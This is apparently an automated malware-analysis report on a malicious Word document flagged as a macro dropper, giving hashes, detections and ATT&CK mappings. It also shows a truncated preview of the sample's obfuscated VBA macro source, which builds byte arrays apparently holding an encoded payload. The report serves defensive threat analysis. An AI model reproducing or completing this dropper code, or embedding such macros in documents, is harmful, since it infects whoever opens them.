Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a6f941fcec01fb00…

MALICIOUS

Office (OLE)

81.5 KB Created: 2018-09-02 19:19:00 Authoring application: Microsoft Office Word First seen: 2019-05-10
MD5: b0684e4a309bcfa6e7bd6b0c633b78b7 SHA-1: 89c9280481f876e33785bde9489b6f7281e32cfc SHA-256: a6f941fcec01fb006fc51df96396aeeb826cdf3864756669e19cb145fe41692f
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-7119458-0. Static analysis revealed the presence of VBA macros, including GetObject and CallByName functions, which are commonly used to execute malicious code. The macros are likely responsible for downloading and executing a second-stage payload, a common technique for droppers.

Heuristics 5

  • ClamAV: Doc.Dropper.Agent-7119458-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7119458-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18977 bytes
SHA-256: 2032fb96c11cfef7fde73b7907aff1e693f88005fa8859490f15674f3d7de1ae
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Layout, 0, 0, MSForms, Frame"
Dim dim62, dim53(2) As Byte, dim36(9) As Byte, dim37(32) As Byte, dim61(19) As Byte, dim50(13) As Byte, dim2(5) As Byte, dim06(55) As Byte, dim00(762) As Byte, dim10(5) As Byte
Private Sub dim42()
dim53(2) = 175
dim53(1) = 209
dim53(0) = 131
End Sub
Private Function dim6(dim1, dim72)
dim6 = dim1 - (dim72 * (dim1 \ dim72))
End Function
Private Sub dim67()
dim06(12) = 203
dim06(28) = 127
dim06(4) = 93
dim06(38) = 108
dim06(43) = 250
dim06(39) = 110
dim06(8) = 25
dim06(52) = 65
dim06(53) = 48
dim06(23) = 74
dim06(40) = 19
dim06(31) = 186
dim06(51) = 10
dim06(9) = 216
dim06(26) = 173
dim06(37) = 32
dim06(24) = 157
dim06(50) = 234
dim06(34) = 239
dim06(54) = 79
dim06(41) = 134
dim06(25) = 174
dim06(1) = 221
dim06(7) = 151
dim06(35) = 159
dim06(46) = 92
dim06(49) = 249
dim06(3) = 108
dim06(55) = 62
dim06(20) = 234
dim06(16) = 94
dim06(17) = 111
dim06(11) = 10
dim06(18) = 17
dim06(32) = 198
dim06(13) = 198
dim06(30) = 233
dim06(21) = 162
dim06(6) = 138
dim06(19) = 147
dim06(27) = 196
dim06(48) = 102
dim06(47) = 168
dim06(14) = 172
dim06(29) = 41
dim06(5) = 65
dim06(42) = 121
dim06(22) = 14
dim06(15) = 50
dim06(44) = 254
dim06(45) = 37
dim06(33) = 173
dim06(10) = 174
dim06(2) = 181
dim06(0) = 179
dim06(36) = 139
End Sub
Private Sub dim45()
dim00(131) = 132
dim00(296) = 199
dim00(95) = 29
dim00(26) = 137
dim00(400) = 17
dim00(63) = 228
dim00(44) = 158
dim00(656) = 162
dim00(416) = 116
dim00(488) = 253
dim00(216) = 228
dim00(195) = 38
dim00(633) = 140
dim00(202) = 230
dim00(591) = 11
dim00(188) = 17
dim00(158) = 109
dim00(292) = 174
dim00(86) = 42
dim00(115) = 153
dim00(178) = 186
dim00(625) = 159
dim00(8) = 96
dim00(189) = 242
dim00(601) = 25
dim00(305) = 184
dim00(198) = 140
dim00(52) = 92
dim00(172) = 243
dim00(681) = 191
dim00(18) = 72
dim00(118) = 95
dim00(712) = 187
dim00(611) = 3
dim00(443) = 119
dim00(557) = 197
dim00(415) = 3
dim00(237) = 234
dim00(566) = 164
dim00(214) = 211
dim00(628) = 173
dim00(518) = 134
dim00(85) = 26
dim00(326) = 28
dim00(515) = 247
dim00(659) = 136
dim00(503) = 139
dim00(498) = 102
dim00(394) = 215
dim00(429) = 141
dim00(672) = 188
dim00(333) = 98
dim00(727) = 19
dim00(80) = 87
dim00(218) = 34
dim00(744) = 99
dim00(684) = 72
dim00(282) = 173
dim00(718) = 134
dim00(245) = 100
dim00(645) = 91
dim00(661) = 248
dim00(130) = 6
dim00(272) = 243
dim00(386) = 89
dim00(501) = 252
dim00(717) = 182
dim00(466) = 219
dim00(107) = 253
dim00(73) = 102
dim00(426) = 227
dim00(741) = 67
dim00(79) = 237
dim00(622) = 175
dim00(471) = 89
dim00(638) = 172
dim00(397) = 95
dim00(437) = 179
dim00(365) = 190
dim00(306) = 163
dim00(249) = 80
dim00(588) = 187
dim00(424) = 216
dim00(667) = 238
dim00(179) = 131
dim00(564) = 97
dim00(726) = 127
dim00(470) = 68
dim00(670) = 240
dim00(616) = 37
dim00(141) = 248
dim00(72) = 130
dim00(514) = 20
dim00(586) = 80
dim00(39) = 127
dim00(67) = 108
dim00(409) = 168
dim00(414) = 46
dim00(664) = 111
dim00(375) = 229
dim00(37) = 46
dim00(55) = 42
dim00(558) = 185
dim00(448) = 102
dim00(389) = 211
dim00(636) = 131
dim00(561) = 39
dim00(327) = 232
dim00(618) = 175
dim00(481) = 107
dim00(308) = 139
dim00(367) = 130
dim00(171) = 190
dim00(380) = 241
dim00(634) = 14
dim00(114) = 139
dim00(252) = 79
dim00(49) = 163
dim00(288) = 153
dim00(84) = 70
dim00(208) = 244
dim00(160) = 88
dim00(393) = 197
dim00(589) = 152
dim00(384) = 104
dim00(580) = 181
dim00(540) = 218
dim00(116) = 158
dim00(225) = 62
dim00(229) = 211
dim00(338) = 13
dim00(3) = 33
dim00(385) = 189
dim00(388) = 227
dim00(227) = 197
dim00(647) = 14
dim00(584) = 71
dim00(473) = 140
dim00(442) = 149
dim00
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.